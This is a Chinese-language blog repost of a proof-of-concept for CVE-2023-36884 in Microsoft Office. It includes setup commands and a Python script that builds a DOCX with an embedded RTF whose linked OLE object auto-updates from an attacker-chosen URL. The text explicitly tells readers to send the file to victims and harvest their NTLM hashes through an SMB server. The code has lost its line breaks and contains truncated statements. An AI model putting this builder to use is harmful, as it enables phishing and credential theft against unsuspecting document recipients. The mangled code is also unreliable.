CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

admin 2024年1月2日10:52:39评论121 views字数 4004阅读13分20秒阅读模式

CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

        该漏洞允许攻击者通过精心制作的 Office 开放可扩展标记语言 (OOXML) 文档来利用 Windows 搜索文件。

安装 PIP 包:

pip install python-docx pywin32         

创建 example.html 文件并启动 Python HTTP Web 服务器:

New-Item -Path "example.html" - ItemType Filepython -m http.server 8888


python merged.docx autolinked.rtf http://localhost:8888/example.html

现在,生成的文件可以通过电子邮件或其他方式与受害者共享。该链接可以指向您的 SMB 服务器以窃取受害者的 NTLM 哈希值,也可以指向包含 iframe 的 HTML 文件,该 iframe 引用了 Windows 搜索文件,就像原始恶意软件中一样。由于缺乏进一步的信息,无法显示确切的利用情况。

# pip install python-docx pywin32import sysimport osfrom docx import Documentfrom docx.oxml.parser import OxmlElementfrom docx.oxml.ns import qnfrom docx.opc.part import Partfrom docx.opc.constants import RELATIONSHIP_TYPE as RTimport win32com.client as win32

# Get or create a DOCX documentdef get_doc(docx_file_path): if not os.path.isfile(docx_file_path): doc = Document() print(f"[+] Created a new DOCX document with name '{docx_file_path}'.") else: doc = Document(docx_file_path) print(f"[+] Using an existing DOCX document with name '{docx_file_path}'.") return doc
# Check if the RTF file exists, and create it if it doesn'tdef check_rtf_exists(rtf_file_path): if not os.path.isfile(rtf_file_path): gen_new_rtf(rtf_file_path) print(f"[+] Created a new RTF document with name '{rtf_file_path}'.") else: print(f"[+] Using an existing RTF document with name '{rtf_file_path}'.")
# Generate a new RTF file with default contentdef gen_new_rtf(rtf_file_path): try: with open(rtf_file_path, 'w') as file: rtf_example_code = "{\rtf1\ansi\deff0}" file.write(rtf_example_code) except Exception as e: print(f"[-] Cannot create the RTF file. Error: {str(e)}") sys.exit(1)
# Update the RTF file by adding 'objupdate' after 'objautolink'def update_rtf_with_objupdate(file_path): try: with open(file_path, 'r') as file: # Read the content of the file file_content =
# Replace "objautolink" with "objautolinkobjupdate" updated_content = file_content.replace(r'objautlink', r'objautlinkobjupdate')
with open(file_path, 'w') as file: # Write the updated content back to the file file.write(updated_content)
print(f"[+] 'objupdate' added after 'objautolink' in '{file_path}'.")
except Exception as e: print(f"[-] An error occurred: {str(e)}")
# Add an RTF file as an altChunk to a DOCX documentdef add_rtf_as_alt_chunk_to_doc(doc, rtf_path): try: package = doc.part.package partname = package.next_partname('/word/altChunk%d.rtf')
# Read the RTF content from the file with open(rtf_path, 'rb') as rtf_file: rtf_content =
alt_part = Part(partname, 'application/rtf', rtf_content, package) r_id = doc.part.relate_to(alt_part, RT.A_F_CHUNK)
alt_chunk = OxmlElement('w:altChunk') alt_chunk.set(qn('r:id'), r_id) doc.element.body.sectPr.addprevious(alt_chunk)
print("[+] RTF file added as altChunk.")
# Save the modified document
except Exception as e: print(f"[-] Can not add the RTF file as altChunk to the DOC. Error: {str(e)}") sys.exit(1)
# Add a linked OLE object with a URL to the RTF filedef add_linked_ole_object_with_url(rtf_path, url): try: word = win32.Dispatch("Word.Application") doc = word.Documents.Open(os.path.abspath(rtf_path)) doc.Activate()
# Insert the linked OLE object with an external URL ole_shape = doc.Shapes.AddOLEObject( ClassType="Package", FileName=url, # Use the URL as the FileName LinkToFile=True, # Create a linked object DisplayAsIcon=True, Left=100, Top=100, Width=100, Height=100 )
# Save the document doc.Save()
# Close the document and Word application doc.Close() word.Quit()
print(f"[+] Linked OLE object with URL added to '{rtf_path}'.")
except Exception as e: print(f"[-] Cannot add a linked OLE object to the RTF file. Error: {str(e)}") sys.exit(1)
if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python <doc_file> <rtf_file> <ole_objects_url>") sys.exit(1)
# Get arguments docx_file_path = sys.argv[1] rtf_file_path = sys.argv[2] url = sys.argv[3]
# Check if the DOCX file exists, if not, create one doc = get_doc(docx_file_path)
# Check if the RTF file exists, if not, create one check_rtf_exists(rtf_file_path)
# Add a linked OLE object to RTF with an external URL add_linked_ole_object_with_url(rtf_file_path, url)
# Add the RTF file to the DOCX as an altChunk add_rtf_as_alt_chunk_to_doc(doc, rtf_file_path)
print(f"[+] RTF file '{rtf_file_path}' added as altChunk to '{docx_file_path}'.")

原文始发于微信公众号(Khan安全团队):CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

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  • 本文由 发表于 2024年1月2日10:52:39
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                   CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE


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